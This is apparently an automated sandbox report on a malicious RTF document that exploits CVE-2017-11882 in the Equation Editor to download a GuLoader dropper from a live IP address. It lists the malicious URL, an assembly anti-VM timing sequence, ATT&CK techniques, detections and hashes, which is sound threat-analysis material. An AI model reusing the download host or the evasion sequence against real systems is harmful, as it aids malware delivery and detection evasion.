    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000037951C3 second address: 00000000037951C3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 42A4596Fh 0x00000007 sub eax, FBADDA8Dh 0x0000000c xor eax, 87ED79C8h 0x00000011 xor eax, C11B072Bh 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F6CCCC562DEh 0x0000001e lfence 0x00000021 mov edx, B78E5550h 0x00000026 xor edx, 614933DAh 0x0000002c add edx, 0CEF4ABFh 0x00000032 xor edx, 9C48B15Dh 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e test dx, bx 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 pop ecx 0x00000045 cmp ch, 0000007Eh 0x00000048 add edi, edx 0x0000004a dec ecx 0x0000004b mov dword ptr [ebp+00000227h], 169B01A4h 0x00000055 xor dword ptr [ebp+00000227h], BF933C27h 0x0000005f fnop 0x00000061 sub dword ptr [ebp+00000227h], B3AFC749h 0x0000006b xor dword ptr [ebp+00000227h], F558763Ah 0x00000075 cmp ecx, dword ptr [ebp+00000227h] 0x0000007b jne 00007F6CCCC56285h 0x0000007d mov dword ptr [ebp+0000024Ch], esi 0x00000083 mov esi, ecx 0x00000085 push esi 0x00000086 mov esi, dword ptr [ebp+0000024Ch] 0x0000008c call 00007F6CCCC5633Fh 0x00000091 call 00007F6CCCC562FFh 0x00000096 lfence 0x00000099 mov edx, B78E5550h 0x0000009e xor edx, 614933DAh 0x000000a4 add edx, 0CEF4ABFh 0x000000aa xor edx, 9C48B15Dh 0x000000b0 mov edx, dword ptr [edx] 0x000000b2 lfence 0x000000b5 ret 0x000000b6 mov esi, edx 0x000000b8 pushad 0x000000b9 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1848Thread sleep time: -180000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037951BB rdtsc 3_2_037951BB
    Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,3_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_3-5817
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_3-5973
    Source: vbc.exe, 00000003.00000002.688026500.00000000004E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 3_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,3_2_73281BFF
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037951BB rdtsc 3_2_037951BB
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03797564 mov eax, dword ptr fs:[00000030h]3_2_03797564
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037937EC mov eax, dword ptr fs:[00000030h]3_2_037937EC
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03796A06 mov eax, dword ptr fs:[00000030h]3_2_03796A06
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03796CD9 mov eax, dword ptr fs:[00000030h]3_2_03796CD9
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037950A9 mov eax, dword ptr fs:[00000030h]3_2_037950A9
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03798130 RtlAddVectoredExceptionHandler,3_2_03798130
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping211
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts12
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth12
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets14
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    lUkTchBi9r.rtf54%VirustotalBrowse
    lUkTchBi9r.rtf51%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
    lUkTchBi9r.rtf100%AviraHEUR/Rtf.Malformed
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B32AB2E9-05F1-4F55-B3EB-076D90494645}.tmp100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B32AB2E9-05F1-4F55-B3EB-076D90494645}.tmp100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe31%VirustotalBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe11%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe21%ReversingLabsWin32.Downloader.GuLoader
    C:\Users\user\AppData\Local\Temp\Bosporus5.dat2%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Bosporus5.dat2%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll0%ReversingLabs
    C:\Users\Public\vbc.exe11%MetadefenderBrowse
    C:\Users\Public\vbc.exe21%ReversingLabsWin32.Downloader.GuLoader
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://bangladeshshoecity.com/images/2w0%Avira URL Cloudsafe
    http://172.245.119.43/344/vbc.exe12%VirustotalBrowse
    http://172.245.119.43/344/vbc.exe100%Avira URL Cloudmalware
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://bangladeshshoecity.com/images/2wtrue
    • Avira URL Cloud: safe
    unknown
    http://172.245.119.43/344/vbc.exetrue
    • 12%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000003.00000000.418770944.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.1.dr, vbc[1].exe.1.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.245.119.43
      unknownUnited States
      36352AS-COLOCROSSINGUStrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:561321
      Start date:27.01.2022
      Start time:10:54:17
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 15s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:lUkTchBi9r (renamed file extension from none to rtf)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winRTF@4/12@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 40.2% (good quality ratio 39.6%)
      • Quality average: 86.8%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 35
      • Number of non-executed functions: 51
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      TimeTypeDescription
      10:54:22API Interceptor58x Sleep call for process: EQNEDT32.EXE modified
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      172.245.119.43A3hamzfUkW.rtfGet hashmaliciousBrowse
      • 172.245.119.43/2200/vbc.exe
      VC_DRAFT PI_1110106.docxGet hashmaliciousBrowse
      • 172.245.119.43/4411/vbc.exe
      PO20210819.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/skin.exe
      PO20210817.xlsxGet hashmaliciousBrowse
      • a.ninis.us/d/hot.exe
      PO20210723.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/pdf.exe
      PO20210722.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/obi.exe
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AS-COLOCROSSINGUSi.arm6Get hashmaliciousBrowse
      • 23.94.138.109
      A3hamzfUkW.rtfGet hashmaliciousBrowse
      • 172.245.119.43
      i.arm7Get hashmaliciousBrowse
      • 23.94.138.109
      i.i586Get hashmaliciousBrowse
      • 23.94.138.109
      i.i686Get hashmaliciousBrowse
      • 23.94.138.109
      i.m68kGet hashmaliciousBrowse
      • 23.94.138.109
      i.mipsGet hashmaliciousBrowse
      • 23.94.138.109
      i.mpslGet hashmaliciousBrowse
      • 23.94.138.109
      i.ppcGet hashmaliciousBrowse
      • 23.94.138.109
      i.sh4Get hashmaliciousBrowse
      • 23.94.138.109
      i.sparcGet hashmaliciousBrowse
      • 23.94.138.109
      i.x86Get hashmaliciousBrowse
      • 23.94.138.109
      Deeds Office Document Copy.xlsxGet hashmaliciousBrowse
      • 192.3.146.154
      SLT10035299.xlsxGet hashmaliciousBrowse
      • 192.3.180.39
      RFQ11054.xlsxGet hashmaliciousBrowse
      • 107.174.138.158
      ACCOUNTS STATEMENT.xlsxGet hashmaliciousBrowse
      • 192.210.219.13
      PSRSG-BPL-221221-1 JOB G225.xlsxGet hashmaliciousBrowse
      • 198.12.127.206
      Order 252022.xlsxGet hashmaliciousBrowse
      • 172.245.27.21
      lod2.xlsxGet hashmaliciousBrowse
      • 198.12.107.201
      VC_DRAFT PI_1110106.docxGet hashmaliciousBrowse
      • 172.245.119.43
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dllA3hamzfUkW.rtfGet hashmaliciousBrowse
        7027521.xlsxGet hashmaliciousBrowse
          SdEkI4IDqd.exeGet hashmaliciousBrowse
            SdEkI4IDqd.exeGet hashmaliciousBrowse
              cP5nXH8fQI.exeGet hashmaliciousBrowse
                cP5nXH8fQI.exeGet hashmaliciousBrowse
                  BL Copy.docGet hashmaliciousBrowse
                    jqkuxbwi.exeGet hashmaliciousBrowse
                      HealthSystray.exeGet hashmaliciousBrowse
                        jqkuxbwi.exeGet hashmaliciousBrowse
                          listing new.xlsxGet hashmaliciousBrowse
                            Pnportd65.exeGet hashmaliciousBrowse
                              Pnportd65.exeGet hashmaliciousBrowse
                                PO-C - 20211213-PLATE.docGet hashmaliciousBrowse
                                  new.xlsxGet hashmaliciousBrowse
                                    8#Ub2e4).exeGet hashmaliciousBrowse
                                      eW8Jsngljx.exeGet hashmaliciousBrowse
                                        o4XzTr73Ut.exeGet hashmaliciousBrowse
                                          uDZovIdfEJ.exeGet hashmaliciousBrowse
                                            q6JYc6gWld.exeGet hashmaliciousBrowse
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:downloaded
                                              Size (bytes):95632
                                              Entropy (8bit):7.524133406272662
                                              Encrypted:false
                                              SSDEEP:1536:2/T2X/jN2vxZz0DTHUpouZZbUc6JgjJPQPovf/5AmNHLBH8k29xE+1Gl1c:2bG7N2kDTHUpouZZbUc6JgjJ4PKfRAI6
                                              MD5:82C5CDDE9DF0A76E2933C1CD8BFC7887
                                              SHA1:7B391B4429DFBF19030FB49CE750AA3C8B844A6B
                                              SHA-256:243AE30D42E90000B882779FAE40E0056EAB332B95E2C938446138A80868909E
                                              SHA-512:EE64B01A269422E45A458D9E77151435ECFBDEB96B2C7D80E961F3E4CFBACB9626F2DF1CB32790DFA174AA2D517868ABD4FD8A9FBED3C5B8FEAC3DAE0A790C7E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 31%, Browse
                                              • Antivirus: Metadefender, Detection: 11%, Browse
                                              • Antivirus: ReversingLabs, Detection: 21%
                                              Reputation:low
                                              IE Cache URL:http://172.245.119.43/344/vbc.exe
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................".....@.............................................(............`...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):4.00330959933804
                                              Encrypted:false
                                              SSDEEP:48:rAeRKtrt8hkNXYDs+DB/RX9gTzS+uJihDbBBHG2ubKjuGM:EeQ5MLDsa5UzZigHBBHEqM
                                              MD5:33EBC6834DD0E6C59C51F33A83572869
                                              SHA1:DD4B7941C41B63039D76FE1BF92E81BB978FE57C
                                              SHA-256:C0C9384A5AC5936DB4D16C7414B713DBF8A589DE8A33EB6A4BE504BED347521E
                                              SHA-512:25203E95649741C840B44279101F042F66642C9EAFDCE8E664978BF42F6E0CF2F93C0C89D6A885EFC409781448C8180FC0EF6B9E56A7BD2E584F904825A51978
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):17408
                                              Entropy (8bit):3.620594761173705
                                              Encrypted:false
                                              SSDEEP:384:8EaSM1scGM6YXUjS1BxqbBkdXOUKQV0fdrAY9+VDyHHYnEwRg6Z:8EaSM1scTqjS1HqydXOUK60fdJMV/nEy
                                              MD5:2C3578CD72C47FBFE75D0CBC24B1469F
                                              SHA1:B7A1E1CA9283CF43533886BBE84C3E1DCB9C1ADA
                                              SHA-256:55B62A2CD39359BD0D66E297E364DAC57BBF417D82F812DD41458B0FC7062FAF
                                              SHA-512:4881416FF9377391DE0522FF0DD3F2391FCF667C3BC288AEB67515D1F4652898A6CAD42D6E66B899C288C9C60158C560E5287E2B92C0358626B5C4734E411C66
                                              Malicious:false
                                              Reputation:low
                                              Preview:*.^._.^.~.`.&.%.*.?.~.1.>.`.).~.0.,...%.#.?...:.6.5.9.!.%.?.?.;._.;.>.?.!.!.?.+.*.-.6._.>.2.@.6.4...4.:.^.>.:.>.(.~.:...,.8.@.|.&.+.=.@.<././.?.,.1.>.2.8.3.?.5.'.;.;.;.'.0.6.>.>.[.+.:.^.,.4.?.^.*.;.5./.&.).$.%.+.$...&.?.<.3.+.2.^.,._.!.&...?.?.`.4...).?.6./...?.3.+.,.].)..._._...].7.].$.5.2.-.).!.:.&.=.6.*.....-.+...@.$.+.6.-.|.+.?.2.'.;.2.?.*.....4...:.&.:.].*.?.^.~.>.8.8.).3.$...$.^.%.;.$.2...=.~.....^.9.7.).(.1.-.^.6.?./.?.].].(.0.%...?.]./.#.>.9.:.^.|.-.?.%.<.5./.&.?.;..._...$...7.#.8.9.....?.+.6.?.>.?.0.?.?.%.?.&.~.$...?.,.?.;.?.3.3.'.].@.1.$.7.%.&.~...#.].*.#.*.8.^.(...*.%...:...1.5.%.%.:.=.[.+...-.?.].=.:.[.?.=.,.~.<.,.~.6.~.0.,.2.?.[.....+.%.*.?.?.>.!.9.6.2.'.%.?...|.=.`...<.3.<.].>.^.!.).$.?.|.$.?.3.1.8.6.=...3.?.?.5./.#.?.=.=.8.&.?./.|.;.7...%.,.?.2.[.?.6.!.'.@.*.?.).7.|...6.~.6.`...'.0.5.?.:.%.%.'.:.[.]...5.5..._.?.^.%.#.#.^.<.@.=.?.).9.^.^.#.2.&.?.#.=.?.6././.|.%.&.2.?.+.<.^.-.=.|.9.).&.4.1.7.!.?.?.&.?.`.<.|.|.=.2.;.#.0.?.^.=.].?.~.4.].4._.?.?.?.=.!.'.!.;.0.`.!.9.4.4.*.9.$.
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:DOS executable (COM)
                                              Category:dropped
                                              Size (bytes):33702
                                              Entropy (8bit):7.640543622166051
                                              Encrypted:false
                                              SSDEEP:768:1FwMrbBlFp7y+OzxSaYStTVsui/XXjqC4iYBnDyvfWjbvx0K:nwMrbnFp7y1wJSJVsPGChMevOF
                                              MD5:2C2658C12C970777B7D352045683823D
                                              SHA1:6EEDC661A65C91EBF2F0CB013ED683CFD704757E
                                              SHA-256:2514D174967C285492114476DC13AAABBBD4248A756770BDD2B60117EE347752
                                              SHA-512:C6778168D222A85C58B7FE38AD81E96413D05DA70603130B74454ACB9A2CA759E8707F71CAEFD1DC16ECF8F4F419A9C4171814D346297280DF78DB0786F86677
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 2%, Browse
                                              • Antivirus: ReversingLabs, Detection: 2%
                                              Reputation:low
                                              Preview:.__.?.u.....u.....u..........o....It....s..svu.....3.....B]..*...W..o...Z1..4..u.N....9.u.W........N..U.-.t .....2D.B.h....R..D..b..K7$"jX[,...1...a........^W.....oz.'.Ut.'..7.Hg..G.....pY..3n.:.u..)..\.4.......ugUB...`..vw.@_iPr..v.5...8.l........F..W...8..k.)...M.c.P.........O...!b....!G.A.......m.......]S5.....JI.s8<K.w..<G...g.<......7}...<..M....5.&.....,........!A...N..\.{.X...P.....bt.N.u.N..>..u.NH.....V.j....w.N........0.Lu....N.....|X.j.....A.g.w.H.iFwX..vo...T./u..!.N.0...L..cic.Ev/.(..N..P....R..#.@.-).u.w..\..u..._..u..9.N.......L.u.O...N.u1.Pu.jQ._....ZQ.5>o}..cX:.}..2SX".}.....!6..I.?.B.r.'.N..- .AX..........X...\....`L...t.e...~....'.N.."\.G....!r^.w...Xz.w.r...j..i..A.......t....2.5.I.1~.F..d ..4..XJ..]Z0..k)p........Xz.Qv.J..j.$D..N..u&.....kO.ub..YW..qlj...Z.(.:I}...ZZ..2.k0...p...&R.t.N.<......v.P..|&d..Fz..@......SOF&..6...%..`7yDP......O.u`G.........(..}...5...$R..t.NF#U...\0,u...J.5...z........l.z.[Fc"TZe...'*%R.Pw
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):16555
                                              Entropy (8bit):5.9518641421213605
                                              Encrypted:false
                                              SSDEEP:384:HpBOk6soHG6Nun3UPBApXPE8eMag91API7ee872UmLZ7:HmkfOG6NNyp/dn19N7U71mLZ
                                              MD5:695A2030432B3D981B012A42EDCA055A
                                              SHA1:31283CF8F970E22E7C9B6FCB811B9C1608997211
                                              SHA-256:F0568B8400FE6F4621B3E62C56B3C3AB9712DD6D30966A348EB3497ACF6B226A
                                              SHA-512:0095FE21135FCCB9C5723D583C2087FB9D9CD61CB90BB5C96E11EA76469A3744B7F068B7301F7342AF95642D18921763B250FBB9E8F16F5CC9124300E6A97C5C
                                              Malicious:false
                                              Reputation:low
                                              Preview:EMr8t0Hhq715RQjpV8l9LooUdWJgMtMf2pE83U2wsss81G5KJFLeIXMa1T93HGjNEbFfy4IRaWjctEH1I3hWG74wsJYdZXNmLTqTenvgec8qpu98Zp4XlrrAhbuVePBg5nxMeoxIojglOuJAvAZef0Nak7gm0ix8xSE70QeFJMFjJvEAWRFFFtZOYkcHhCgewp7YBE8OekOsOrcexafRG4AdZaWBz3yCE4qMP0NAcxJ4DHeCdzbc6hW8i8otpHEpw0OGDSzOwMl9VCfHuXXhaw0zVcWRcWKg1sABn5d7OrJ2xhlYvPjqrY5w7z8FN0FgE8XtOgiSbRGN0toQLHc2vjrb52VFWESFWMUHsKSZfQ4PbqkilIzeyLOvDdo44fuucajegzqku9brw7f8p9R2zFXqooBphSkPzHY6XmnyhU3WyDWzX4CroF6xRQXhjjk7OqKFaLu4ORq54CnRXdGfPhd7dzPgYFxqUkZaqo2ckBxUeh3QLr4p1ievUUewtab3AdAT2kjQDq4NVPoAQ5jJvQkApXm49qXhPrvrU2YzKVhY5ajHSj55DsIeOSI066y24ayag5YtldIsnpkasB3iqzZiXwJJSOwZVHVJGChfSumllKT835iwi6k9utWFP5wIpTCqM6CflHh1JSg5HTMqV8fq5VseXa9XzYpdeJu9OBtsanwwES7WtQoLDnmScaoIfCjrIqw61PPDM8QEGM14KrtcVF5ERKQSh6jPyKwNObsN9Ts4FbeSzqr0KnDMekc8p8tRrSRckLbRBa58jfVkjWjcQeuGU8J8gr9f2EG5bdrGEds4pfOwG1TGJcUCr6T8jH9Q82m4wdSeL3wJDr5HYJN0ESkrvn77s4vH90F55tPEmd6ZjNInCzW2BOZfhfO10qNfHa7ZhuyiWVIf05P6uzThDVcRpFtIjVTvGctBTjxS6LEiUlof2CsVigpyEGuXekSTdPsflqGf5sMzKcxKlDJc6mtYp7gIqQODeycT
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
